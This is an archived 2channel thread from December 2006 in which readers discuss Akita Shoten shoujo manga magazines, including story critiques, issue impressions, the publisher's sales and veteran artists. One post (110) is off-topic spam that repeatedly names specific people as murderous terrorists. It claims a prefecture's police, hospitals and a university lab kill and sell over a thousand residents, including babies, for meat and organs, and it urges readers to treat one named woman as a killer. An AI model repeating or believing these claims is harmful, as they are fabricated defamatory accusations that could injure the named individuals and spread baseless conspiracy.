足跡を(読みきり)…絵は試行錯誤しているよう。話は巧くなってきている。所々できらんと光るものを感じる。
新人さんに欲を言えば、せっかく説明まで取り入れた「ホワイトアウト」を有用に活かせる場面があったはず。
夢語り…無駄が多い。言葉を簡潔にまとめたほうがいい。マニュアル本の漫画のよう。
言葉に定型イラストが付いているだけの漫画になっている。 絵は可愛い。だが、悪く言えばそれだけ。
私の大事(読みきり)…短編の本をたくさん読むか、色々な映画を観るかして話づくりの基礎力をうpして欲しい。
「泣くための器官」っていうのは?です。「悲しみを感じるユニット」みたいなものにするか、
思い切ってその部分をばさっとカットして、まったく別の結末にしたほうがいい。

総評…
言葉に頼り過ぎているように思う。
絵の描写力や構図、コマ割りを利用して表現できるものまで、言葉にしているのが気になる。
その点で言えば、せとなさんは抜群な感性を持っていると思う。(この場合、話は置いておく)
漫画なんだから「絵で魅せる」、「絵で語る」という漫画の長所を生かすこともやって欲しい。
もちろん、その上にさらに言葉を乗せて相乗効果も狙えるシーンも作れるけど。

107 :花と名無しさん:2006/12/21(木) 16:28:19 ID:???O
シノビ2巻来月発売か。
かげとら楽しみ。

108 :花と名無しさん:2006/12/21(木) 16:36:08 ID:???O
>>107
同じく。
コミクス派なんで待ち遠しかった。
やっと来月かー!

109 :花と名無しさん:2006/12/23(土) 20:40:25 ID:???0
姫金1月号
>>89テンプレいただきます。

お初… 前回と雰囲気変わったなー。
プリちゃん… うーん。。
縛り屋… 子供化が無ければなぁ
砂の下… 父ちゃんヒドス
天使… 解雇はいいが最後の給金は貰えたのか。
アルジャン… 婿候補。そういやいたねそんなの
北宋… 皇帝株引き続き暴落中。
ドラキウイラ… どこまでも庶民なのね
アリーズ… 過去作のイメージ壊すの怖くて読めない・・・スルー
キルト… 興味ない。スルー
破龍… あれ?逆戻りした?
浪漫… まとめに入った感じ。
着メロ… ライトノベルな読後感
仮面… そこはかとなくいつかどこかで見た話。
黄昏… 近未来通信ネタ?
金色… 設定関係ないような。
トントン… 面白くないわけではないが。

110 :L:2006/12/23(土) 21:35:29 ID:mfY4yDmF0
★★★★★★★★★★★★★★★★★★★★★★★★★
残念だが(裏金で県民を無差別に殺す)事実上の
殺人テロリスト犯罪カルト教育集団は実在する。

近藤啓子(1期生)が殺人テロリストなのは間違いない。
★★★★★★★★★★★★★★★★★★★★★★★★★

佐藤了は学生や卒業生を使った殺人テロ企画を多発させている。
安藤氏もこの殺害風土で消された可能性がある。
この県の殺人稼業は警察ぐるみである。
赤ん坊から老人まで年間1000人はこの殺人商売制度で消され換金されている。
殺人業態は造園業、道路工事業、除雪作業、病院などの形態を表面上は取り
集団で人を狩り、人肉や臓器に換金する。近藤啓子が殺人テロリストなのは間違いない。
殺害対象は赤ん坊まで多数含まれ、この県では病院で赤ん坊死体が食通マニアのために販売されている。
警察や病院も当然ぐるであり、赤ん坊殺人に関わっている。近藤啓子が殺人テロリストなのは間違いない。
こういった殺人理論を開発しているのが保全生態学(森林科学)研究室である。
その上で環境教育と称してカルト殺人教育を行い、卒業生の一部は次々と県民を殺害し
死体を解体して生計を立てている。それがこの県の実態の一面である。
近藤啓子が殺人テロリストなのは間違いない。年間1000人以上が殺害され自然死偽装されている。
近藤啓子が殺人テロリストなのは間違いない。この県の住民は彼女を見かければ殺人業者として
接するべきである。そうしないと騙されて喰われる。近藤啓子が殺人テロリストなのは間違いない。
県民は全員、気をつけてほしい。年間1000人以上が理不尽に消され喰われている。
造園業者は危険だ。近藤啓子が殺人テロリストなのは間違いない。

他県へ「出稼ぎ」もする


111 :花と名無しさん:2006/12/23(土) 23:17:00 ID:???0
今月のダ・ヴィンチに好きな出版者ランキングがあって
秋田は少数派の意見にすら入ってなかった。
好きな作家にプッチの作者が入っていただけ(それでも少数派の意見)

大丈夫なんだろうか??

112 :花と名無しさん:2006/12/23(土) 23:54:54 ID:???0
>>111
そうなんだ。。。orz
でも、以前はもっとヤバイと思った時期があったから
それから比べると秋田も頑張っているじゃないかと思えるけど
努力と結果は別だからね
確かにこのままではヤバイと思う


113 :花と名無しさん:2006/12/24(日) 06:38:29 ID:???0
103がきいたのは、
お初はあの兄たちの実の妹ではないということなので、
実の親は大店の主だったりするのか、という意味では。

114 :花と名無しさん:2006/12/24(日) 19:39:06 ID:???0
ダヴィンチは小説の話題がメインなせいもあるんじゃない?
秋田、小説はないよね? あったとしても知られてないし・・・
あっフォローにならなかった・・・

115 :花と名無しさん:2006/12/24(日) 19:42:47 ID:???0
秋田は基本的には漫画専門出版社。

116 :花と名無しさん:2006/12/24(日) 20:03:58 ID:???0
そのわりにはコミックス置いてない本屋がけっこうあるのは情けない。

117 :花と名無しさん:2006/12/25(月) 00:56:40 ID:???0
週刊誌・ファッション誌・文芸誌・百科事典なんか出しているような
超大手出版社と比べたら可哀想だ。

118 :花と名無しさん:2006/12/25(月) 08:20:22 ID:???0
秋田って、手塚御大と水島御大のお蔭で成り立ってる出版社だと
思っている。マジで。

119 :花と名無しさん:2006/12/26(火) 01:40:42 ID:???0
>>118
細川御大も加えてほしい。
昭和30年代の少女漫画黎明期に少女漫画の基礎を作り上げた人ですよ。
その頃はもっと大手の出版社でバリバリ描いてたけど、他誌に描いたのを
逆恨みされて手を回され、どこの出版社からも仕事を干されていた時に
拾ってくれた秋田にずっと描き続けて30年。
実際、お請けの掲載がある月とない月では姫本誌の売上が違うらしいし、
お請けの連載終了したら姫は終わりだと言われて久しい・・・

120 :花と名無しさん:2006/12/26(火) 02:44:25 ID:???0
内容はもうダラダラ組だけど、王家は根強いファンから最近のファンもいるもんね。
確かに本屋に行っても、掲載月とそうでない月では無くなるのが早いように感じる
それとも、はじめから発行部数を調整しているんだろうか?

121 :花と名無しさん:2006/12/26(火) 09:59:30 ID:???O
ティエコたんの御請の売り上げは素直に感嘆するが、
少女漫画界の基礎が何たらはおかしいとオモ。
24年組みたいに、作風が後進の漫画家に多大な影響を与えたと言った実績は
ほとんどない(1作を除いて)。
絵柄のキラキラ画なら水野御大やわたなべ御大が既に描いた後。

122 :花と名無しさん:2006/12/26(火) 10:36:55 ID:???0
>>121
ある程度の年齢になったら、活躍の場をレディスに移す漫画家が多い中、
現役で少女漫画雑誌で連載する姿は前代未聞かと(ミウッチーは交信中なので除外)。
私は王家を読まなくなって久しいけれど、未だに新規読者がつくことに驚嘆する。

123 :花と名無しさん:2006/12/26(火) 11:04:17 ID:???O
少女漫画誌で継続≠少女漫画の基礎を作り上げた、だと思う。
姫を移動せずに長期連載を継続できる売り上げ(信者獲得)の部分のみ、エライ。

少女漫画誌で長期連載なら、あさりちゃんとパタリロも(誌面移動はあったけど)。
年数は少し足りないがコミックスは多い。
少女漫画誌で仕事なら、ミウッチを例に挙げているので萩尾御大がフラワーズに。
しかもごく最近、SFで受賞してたね。

124 :花と名無しさん:2006/12/26(火) 11:06:15 ID:???O
>>121
細川御大の全盛期は週刊誌連続で立て続けにヒットを飛ばした昭和30年代なのですよ。
40年代にTVドラマ化して人気があったらしい「アテンション・プリーズ」も御大の作品。
その頃には漫画で一財産築いて、まだ海外旅行が手の届かない憧れだった時代に
妹と世界一周旅行に二度も出掛け、飛行機の窓からピラミッドが見えて
「今度はエジプト物もいいわね」で始まったのが王家の紋章だそうです。

125 :124:2006/12/26(火) 11:08:58 ID:???O
訂正
× 週刊誌連続
○ 週刊誌連載

126 :花と名無しさん:2006/12/26(火) 17:25:36 ID:???0
>>123
受賞とかって、基準はよくわからないけど、作品の完成度には
あんまり関係ない作品も中にはあるような気がする。

萩尾先生も結構多いけど、スターレッドとかポーとか微妙。
白癬の清水玲子先生だって、あの輝夜姫で受賞してたし、、、

127 :花と名無しさん:2006/12/26(火) 17:31:37 ID:???0
そもそもあのテの賞って、一般読者から見てなんの意味が
あるのかと疑問だ。どうしてこの作品を?
どうしていまの時期に? ということはしばしば。
賞とったから読んでみようと思う読者は
あまりいないような気がする。

128 :花と名無しさん:2006/12/26(火) 19:25:45 ID:???0
賞とったから読んでみようと思う人は
普通の小説なんかの人数と比べりゃそれはあまりいないけど
SFに興味のある人で漫画読む人なら、一応いるようだよ

129 :花と名無しさん:2006/12/27(水) 00:17:20 ID:???0
細川センセは24年組に影響を与えた世代では。
木原敏江が細川センセの絵についてどこかで語ってたな。

130 :花と名無しさん:2006/12/27(水) 17:04:52 ID:???0
話豚ギリ。

お初、どうしても絵がだめだ。
キャラの顔がバタ臭くて江戸ものに見えない。
他に話にマッチする絵師いなかったのか?

131 :花と名無しさん:2006/12/28(木) 01:29:25 ID:???0
ドウイ。
お初の髪型もなんだか嫌だ。
ついでに長男の月代が後ろにズレてるように見える。

132 :花と名無しさん:2006/12/28(木) 10:44:50 ID:???0
清楚系のいい意味で地味な絵がよかった

133 :花と名無しさん:2006/12/28(木) 12:18:32 ID:???0
確かに顔が濃いせいか、みんな南蛮人に見える、、、。
絵もBLっぽいよね?BL嫌いじゃないけど。

134 :花と名無しさん:2006/12/28(木) 15:43:03 ID:???0
でも原作者さんは気に入ってるみたいなコメントがあったよ。
原作読者さんにも受けはいいんじゃないか?
でなきゃ続かないだろう。

135 :花と名無しさん:2006/12/28(木) 18:35:47 ID:???O
実際はどう思っているとしても、表では
評価するコメントを出すもんだよ>原作者
明らかに外しちゃってるアニメ化やドラマ化であっても
必ず言うじゃん、素晴らしいスタッフにめぐまれて云々とか

136 :花と名無しさん:2006/12/28(木) 18:55:07 ID:???0
秋田の公式(姫のページ)更新してる!!
どうしたんだろう…

137 :花と名無しさん:2006/12/28(木) 20:56:34 ID:???0
>>136
ハゲワロスw まぁ年末にやり残しておきたくないと思った
真面目な社員がいたんだろ。毎度そうだといいのになw

138 :花と名無しさん:2006/12/28(木) 21:03:29 ID:???0
新年(1/6・土曜発売)姫 2月号
ttp://www.akitashoten.co.jp/CGI/autoup/syousaiput.cgi?id=01869

新年(1/6・土曜発売)ミスボ 2月号
ttp://www.akitashoten.co.jp/CGI/autoup/syousaiput.cgi?id=01868
あしべ信者としては、‘「悪魔の花嫁」プロジェクト始動! 詳しくは雑誌で!’に
もの凄く惹かれる〜〜〜。文庫の原作者完結宣言とも読める後書きで
諦めていたけど、何だろwktk

139 :花と名無しさん:2006/12/29(金) 09:21:35 ID:???0
完結! 続けなくていい。連載しなくていい。
とにかく完結を!

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)